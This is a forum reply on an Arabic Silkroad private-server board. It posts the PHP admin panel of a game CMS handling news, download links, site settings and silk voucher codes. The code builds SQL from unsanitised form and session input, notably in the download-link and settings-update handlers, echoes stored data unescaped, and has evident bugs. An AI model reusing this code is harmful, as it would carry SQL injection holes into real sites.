|
|
• الانـتـسـاب » Dec 2015
|
|
• رقـم العـضـويـة » 128751
|
|
• المشـــاركـات » 111
|
|
• الـدولـة »
|
|
• الـهـوايـة » Silkroad4Arab [S4A] ツ
|
|
• اسـم الـسـيـرفـر » No Server
|
|
• الـجـنـس » Male
|
|
• نقـاط التقييم » 10
|
|
|
![[KoTa] غير متواجد حالياً](sawaweb/statusicon/user_offline.gif)
|
.gif)
رد: عاوز واحد يكون خبير فى الsite ويحللى المشكله دي
admin
كود PHP:
<?php
$userRank = core::$sql->getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($_SESSION[username])."'");
if($userRank != "admin")
{
echo "NOT ADMIN";
return;
}
switch($_GET['act'])
{
case('news'):
if(!isset($_GET['subact']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">News</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">News</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<div class="span9">
<ul class="unstyled">
<li><i class="icon-plus-sign color-green"></i> <a href='?pg=admin&act=news&subact=add'><b>Add</b></a></li>
<li><i class="icon-remove-sign color-green"></i> <a href='?pg=admin&act=news&subact=del'><b>Delete</b></a></li>
<li><i class="icon-edit color-green"></i> <a href='?pg=admin&act=news&subact=edit'><b>Edit</b></a></li>
</ul>
</div><!--/span4-->
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
switch($_GET['subact'])
{
case('add'):
if(!isset($_POST['submit']) && !isset($_POST['title']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Add News</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Add News</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<form class="reg-page" method="post" role="form">
<h3>Add News</h3>
<div class="controls">
<label>Title<span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-hand-right color-green"></i></span>
<input type="text" name="title" autocomplete="off" maxlength="16" placeholder="Title" style="width: 165%" class=""/>
</div>
<label>Message<span class="color-red">*</span></label>
<div class="input-prepend">
<textarea name="textBox" id="textBox" placeholder="Title"></textarea>
</div>
</div>
<div class="controls form-inline">
<?php echo misc::back();?>
<input type="submit" name="submit" class="btn-u pull-right" value="Add">
</div>
</form>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<script>CKEDITOR.replace('textBox');</script>
<?php }
else
{
$szTitle = security::toHTML($_POST['title']);
//$szText = misc::applyAttributesToText($_POST['textBox']);
$szText = stripslashes(security::toHTML($_POST['textBox']));
core::$sql -> exec("insert into srcms_news(title,content,author,time) values('$szTitle','$szText','$_SESSION[username]','".misc::getDateTime()."')");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Add News</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Add News</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<?php
echo "News article added.<br/>";
misc::redirect('?pg=admin&act=news', 1);
?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
break;
case('del'):
if(isset($_GET['id']))
{
$nID = (int)$_GET['id'];
if(core::$sql -> numRows("select * from srcms_news where id='$nID'") > 0)
{
core::$sql -> exec("delete from srcms_news where id='$nID'");
core::$sql -> exec("delete from srcms_newscomments where newsID='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Article deleted</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Article deleted</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<?php
echo "News article deleted.<br/>";
misc::redirect('?pg=admin&act=news&subact=del',3);
?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php break;
}
else
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Article deleted</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Article deleted</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<?php
echo " You can't delete article that does not exist.<br/>";
misc::redirect('?pg=admin&act=news&subact=del',3);
?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
}
if(!isset($_POST['submit']) && !isset($_GET['id']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Add News</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Add News</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td>ID</td>
<td>Title</td>
<td>Author</td>
<td>Time</td>
<td>Action</td>
<tr/>
<?php $hNewsArticles = core::$sql -> exec("select * from srcms_news");
if(core::$sql -> numRows("select * from srcms_news") == 0)
{?>
No news added yet<br/>
<?php }
else
{
while($row = mssql_fetch_array($hNewsArticles))
{?>
<tr>
<td><?php echo $row[id];?></td>
<td><?php echo $row[title];?></td>
<td><?php echo $row[author];?></td>
<td><?php echo $row[time];?></td>
<td><?php echo misc::back();?> <a href='?pg=admin&act=news&subact=del&id=<?php echo $row[id];?>' class="btn-u">Delete</a>
<tr/>
<?php
}
}?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
break;
case('edit'):
if(!isset($_POST['submit']) && !isset($_GET['id']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Add News</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Add News</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td>ID</td>
<td>Title</td>
<td>Author</td>
<td>Time</td>
<td>Action</td>
<tr/>
<?php $hNewsArticles = core::$sql -> exec("select * from srcms_news");
if(mssql_num_rows($hNewsArticles) == 0)
{?>
No news added yet<br/>
<?php }
else
{
while($row = mssql_fetch_array($hNewsArticles))
{?>
<tr>
<td><?php echo $row[id];?></td>
<td><?php echo $row[title];?></td>
<td><?php echo $row[author];?></td>
<td><?php echo $row[time];?></td>
<td><?php echo misc::back();?> <a href='?pg=admin&act=news&subact=edit&id=<?php echo $row[id];?>' class="btn-u">Edit</a></td>
<tr/>
<?php
}
}?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
$nID = (int)$_GET['id'];
if(core::$sql -> numRows("select * from srcms_news where id='$nID'") == 0)
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Article deleted</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Article deleted</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<?php
echo " You can't edit article that does not exist.<br/>";
misc::redirect('?pg=admin&act=news&subact=del',3);
?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
if($_POST['submit'] != 'Save')
{
$hArticleData = core::$sql -> exec("select * from srcms_news where id='$nID'");
$hArticleData = mssql_fetch_array($hArticleData);?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Edit News(<?php echo $hArticleData[title];?>)</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Edit News</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<form class="reg-page" method="post" role="form">
<h3>Edit News(<?php echo $hArticleData[title];?>)</h3>
<div class="controls">
<label>Title<span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-hand-right color-green"></i></span>
<input type="text" name="title" autocomplete="off" maxlength="16" style="width: 165%" value="<?php echo $hArticleData[title];?>"/>
</div>
<label>Message<span class="color-red">*</span></label>
<div class="input-prepend">
<textarea name="textBox" id="textBox"> <?php echo $hArticleData[content];?></textarea>
</div>
</div>
<div class="controls form-inline">
<?php echo misc::back();?>
<input type="submit" name="submit" class="btn-u pull-right" value="Save">
</div>
</form>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<script>CKEDITOR.replace('textBox');</script>
<?php }
else
{
$szTitle = security::toHTML($_POST['title']);
$szText = stripslashes(security::toHTML($_POST['textBox']));
core::$sql -> exec("update srcms_news set title='$szTitle',content='$szText' where id='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Article deleted</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Article deleted</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<?php
echo "News article edited.<br/>";
misc::redirect('?pg=admin&act=news&subact=edit',3);
?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
}
}
break;
default:
echo "Unknown subaction";
break;
}
#echo "<br/>";misc::back();
}
break;
case('dl'):
if(!isset($_GET['subact']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Download</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Download</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<div class="span9">
<ul class="unstyled">
<li><i class="icon-plus-sign color-green"></i> <a href='?pg=admin&act=dl&subact=add'><b>Add</b></a></li>
<li><i class="icon-remove-sign color-green"></i> <a href='?pg=admin&act=dl&subact=del'><b>Delete</b></a></li>
<li><i class="icon-edit color-green"></i> <a href='?pg=admin&act=dl&subact=edit'><b>Edit</b></a></li>
</ul>
</div><!--/span4-->
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
switch($_GET['subact'])
{
case('add'):
if(!isset($_POST['submit']) && !isset($_POST['link']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Add Download</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Add Download</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<form class="reg-page" method="post" role="form">
<h3>Add Download</h3>
<div class="controls">
<label>Uploaded on<span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-hand-right color-green"></i></span>
<input type="text" name="name" autocomplete="off" maxlength="16" placeholder="Example: MEGA" style="width: 165%" class=""/>
</div>
<label>Link<span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-hand-right color-green"></i></span>
<input type="text" name="link" autocomplete="off" maxlength="16" placeholder="Download Link" style="width: 165%" class=""/>
</div>
<label>Name/Time<span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-hand-right color-green"></i></span>
<input type="text" name="description" autocomplete="off" maxlength="16" placeholder="Example: Full Client Official (06/02/2014)" style="width: 165%" class=""/>
</div>
</div>
<div class="controls form-inline">
<?php echo misc::back();?>
<input type="submit" name="submit" class="btn-u pull-right" value="Add">
</div>
</form>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
$szName = security::toHTML($_POST['name']);
$szDesc = security::toHTML($_POST['description']);
if(!security::isValidUrl($_POST['link']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Add Download</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Add Download</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
Invalid URL <?php echo misc::back();?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php break;
}
else
{
core::$sql -> exec("insert into srcms_downloads(name,link,description) values('$szName','$_POST[link]','$szDesc')");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Add Download</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Add Download</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
Successfully added link to downloads. <?php echo misc::redirect('?pg=admin&act=dl',3);?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
}
break;
case('del'):
if(!isset($_POST['submit']) && !isset($_GET['id']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Download Link</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Download Link</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td>ID</td>
<td>Uploaded on</td>
<td>Link</td>
<td>Name/Time</td>
<td>Delete</td>
<tr/>
<?php $hLinkList = core::$sql -> exec("select * from srcms_downloads");
if(mssql_num_rows($hLinkList) > 0)
{
while($row = mssql_fetch_array($hLinkList))
{?>
<tr>
<td><?php echo $row[id];?></td>
<td><?php echo $row[name];?></td>
<td><?php echo $row[link];?></td>
<td><?php echo $row[description];?></td>
<td><?php echo misc::back();?> <a href='?pg=admin&act=dl&subact=del&id=<?php echo $row[id];?>' class="btn-u pull-right">Delete</a></td>
<tr/>
<?php }
}
else
{
echo "No links added yet.<br/>";
}?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
$nID = (int)$_GET['id'];
if(core::$sql -> numRows("select * from srcms_downloads where id='$nID'") > 0)
{
core::$sql -> exec("delete from srcms_downloads where id='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Download Link</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Download Link</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
Link successfully deleted. <?php echo misc::redirect('?pg=admin&act=dl', 3);?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Download Link</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Download Link</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
You are trying to delete link with ID that was not found in database. <?php echo misc::redirect('?pg=admin&act=dl', 3);?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
}
break;
case('edit'):
if(!isset($_POST['submit']) && !isset($_GET['id']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Download Link</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Download Link</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td>ID</td>
<td>Uploaded on</td>
<td>Link</td>
<td>Name/Time</td>
<td>Edit</td>
<tr/>
<?php $hLinks = core::$sql -> exec("select * from srcms_downloads");
if(mssql_num_rows($hLinks) > 0)
{
while($row = mssql_fetch_array($hLinks))
{?>
<tr>
<td><?php echo $row[id];?></td>
<td><?php echo $row[name];?></td>
<td><?php echo $row[link];?></td>
<td><?php echo $row[description];?></td>
<td><?php echo misc::back();?> <a href='?pg=admin&act=dl&subact=edit&id=<?php echo $row[id];?>' class="btn-u pull-right">Edit</td>
<tr/>
<?php }
}
else
{
echo "No links added yet.<br/>";
break;
}?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
$nID = (int)$_GET['id'];
$hLinkData = core::$sql -> exec("select * from srcms_downloads where id='$nID'");
if(mssql_num_rows($hLinkData) > 0)
{
if(!isset($_POST['link']))
{
$hArray = mssql_fetch_array($hLinkData);?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Edit Download Link</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Edit Download Link</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<form class="reg-page" method="post" role="form">
<h3>Edit Download(<?php echo $hArray[name];?>)</h3>
<div class="controls">
<label>Uploaded on<span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-hand-right color-green"></i></span>
<input type="text" name="title" autocomplete="off" style="width: 165%" value="<?php echo $hArray[name];?>"/>
</div>
<label>Link<span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-hand-right color-green"></i></span>
<input type="text" name="title" autocomplete="off" style="width: 165%" value="<?php echo $hArray[link];?>"/>
</div>
<label>Name/Time<span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-hand-right color-green"></i></span>
<input type="text" name="title" autocomplete="off" style="width: 165%" value="<?php echo $hArray[description];?>"/>
</div>
</div>
<div class="controls form-inline">
<?php echo misc::back();?>
<input type="submit" name="submit" class="btn-u pull-right" value="Save">
</div>
</form>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
if(!security::isValidUrl($_POST['link']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Edit Download Link</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Edit Download Link</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
Invalid URL<br/> <?php echo misc::back();?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
$szName = misc::toHTML($_POST['name']);
$szDesc = misc::toHTML($_POST['description']);
core::$sql -> exec("update srcms_downloads set name='$szName',description='$szDesc',link='$_POST[link]' where id='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Edit Download Link</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Edit Download Link</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
Link successfully edited <br/> <?php echo isc::redirect('?pg=admin&act=dl', 3);?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
}
}
else
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Edit Download Link</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Edit Download Link</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
Record with ID you requested was not found in database.. <?php echo misc::back();?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php break;
}
}
break;
default:echo "Unknown subaction"; break;
}
#echo "<br/>";
#misc::back();
}
break;
case('settings'):
if($_POST['submit'] != 'Save')
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Edit Settings</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Edit Settings</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<table class="reg-page table table-striped" border="0" cellpadding="0" cellspacing="0">
<form method='post'>
<tr>
<td>ValueName</td>
<td>Value</td>
<tr/>
<?php $hSettings = core::$sql -> exec("select * from srcms_settings");
while($row = mssql_fetch_array($hSettings))
{?>
<tr>
<td><?php echo $row[valueName];?></td>
<td>
<div class="input-prepend">
<span class="add-on"><i class="icon-certificate color-green"></i></span>
<input type='text' name='<?php echo $row[valueName];?>' value='<?php echo $row[value];?>'>
</div>
</td>
<tr/>
<?php } ?>
<tr>
<td></td>
<td>
<div class="controls form-inline">
<?php echo misc::back();?>
<input type="submit" name="submit" class="btn-u pull-right" value="Save">
</div>
</td>
</tr>
</form>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
foreach($_POST as $nElement => $nElementValue)
{
core::$sql -> exec("update srcms_settings set value='$nElementValue' where valueName='$nElement'");
}?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Edit Settings</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Edit Settings</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
Settings saved.<br/><?php echo misc::redirect('?pg=admin&act=settings',3 );?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
break;
case('epin'):
if(!isset($_GET['subact']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Epin System</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Epin System</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<ul class="unstyled">
<li><i class="icon-plus-sign color-green"></i> <a href='?pg=admin&act=epin&subact=gen'><b>Generate new epin code</b></a></li>
<li><i class="icon-eye-open color-green"></i> <a href='?pg=admin&act=epin&subact=lookup'><b>Lookup codes</b></a></li>
</ul>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
switch($_GET['subact'])
{
case('gen'):
if(!isset($_POST['submit']))
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Generate new Epin code</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Generate new Epin code</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<form class="reg-page" method="post" role="form">
<h3>Generate new Epin code</h3>
<div class="controls">
<label>Silk Amount<span class="color-red">*</span></label>
<div class="input-prepend">
<span class="add-on"><i class="icon-hand-right color-green"></i></span>
<input type="text" name='silkAmount' autocomplete="off" maxlength="16" placeholder="Silk Amount" style="width: 165%" class=""/>
</div>
</div>
<div class="controls form-inline">
<?php echo misc::back();?>
<input type="submit" name="submit" class="btn-u pull-right" value='Generate new epin'>
</div>
</form>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{
$nRandCode = rand(1000000000,2000000000);
if(core::$sql -> numRows("select * from srcms_epin where code='$nRandCode'") == 0)
{
$nSilk = (int)$_POST['silkAmount'];
core::$sql -> exec("insert into srcms_epin(code,silkAmount) values('$nRandCode','$nSilk')");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Generate new Epin code</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Generate new Epin code</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
Epin generated, CODE: <b class="color-red"><?php echo $nRandCode;?></b>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Generate new Epin code</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Generate new Epin code</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
Please, re-generate code. <?php echo misc::back();?></b>
